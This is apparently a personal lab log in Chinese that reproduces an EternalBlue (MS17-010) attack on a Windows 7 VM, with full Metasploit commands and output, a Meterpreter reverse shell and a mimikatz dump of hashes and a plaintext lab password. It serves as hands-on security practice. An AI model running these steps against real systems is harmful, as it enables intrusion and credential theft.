上次由于网络问题没复现的现在再搞一遍
ms17_010:
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.1.5
rhost => 192.168.1.5
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.5:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
很难搞,我明白了
之前设置的是桥接,就是连接家里同个wifi的都可以互ping
但是我笔记本连的wifi和台式机的网段不一样
我一看,可恶,我台式是用的网线,那个网段是80.1
笔记本上一看是80.2
所以3种解决方法:
- 笔记本插网线,但是暂时没条件
- vmware里面再装kali虚拟机,然后用同样的设置(桥接)
- 物理机(宿主机)上面装wsl,然后改vmware网络为net
本来想搞的方法2,结果阴差阳错搞了方法3
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.80.128
set lport 4567
exploit
下面是运行结果
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wi
ki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Win
dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 20
08 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.24.105.158 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.80.128
rhost => 192.168.80.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.24.105.158
lhost => 172.24.105.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4567
lport => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 172.24.105.158:4567
[*] 192.168.80.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.80.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.128:445 - The target is vulnerable.
[*] 192.168.80.128:445 - Connecting to target for exploitation.
[+] 192.168.80.128:445 - Connection established for exploitation.
[+] 192.168.80.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.80.128:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.80.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.80.128:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.80.128:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.80.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.80.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.80.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.80.128:445 - Starting non-paged pool grooming
[+] 192.168.80.128:445 - Sending SMBv2 buffers
[+] 192.168.80.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.80.128:445 - Sending final SMBv2 buffers.
[*] 192.168.80.128:445 - Sending last fragment of exploit packet!
[*] 192.168.80.128:445 - Receiving response from exploit packet
[+] 192.168.80.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.80.128:445 - Sending egg to corrupted connection.
[*] 192.168.80.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.24.96.1
[*] Meterpreter session 1 opened (172.24.105.158:4567 -> 172.24.96.1:53290 ) at 2022-04-23 22:35:25 +0800
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
笑死,我进来本想提权,结果发现开局直接是system
想看system提全可以去用viper
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator GOD edea194d76c77d87840ac10a764c73 8a963371a63944419ec1adf687bb1b 343f44056ed02360aead5618dd42e46
62 e5 14b5f70cf
STU1$ GOD 0ba7dcdc7f5bef947c985490b99228 e5c0f994e94ef2ac378ddb8c784bfb3
c1 3dda7927a
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator GOD hongrisec@2019
STU1$ GOD df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49
82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2
c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6
42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88
1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 5
9 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0
84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e
74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Administrator GOD hongrisec@2019
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator GOD.ORG hongrisec@2019
stu1$ god.org df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 4
9 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed
2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71
d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c
5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e
61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49
b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 0
3 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
stu1$ GOD.ORG df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 4
9 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed
2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71
d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c
5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e
61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49
b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 0
3 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
meterpreter >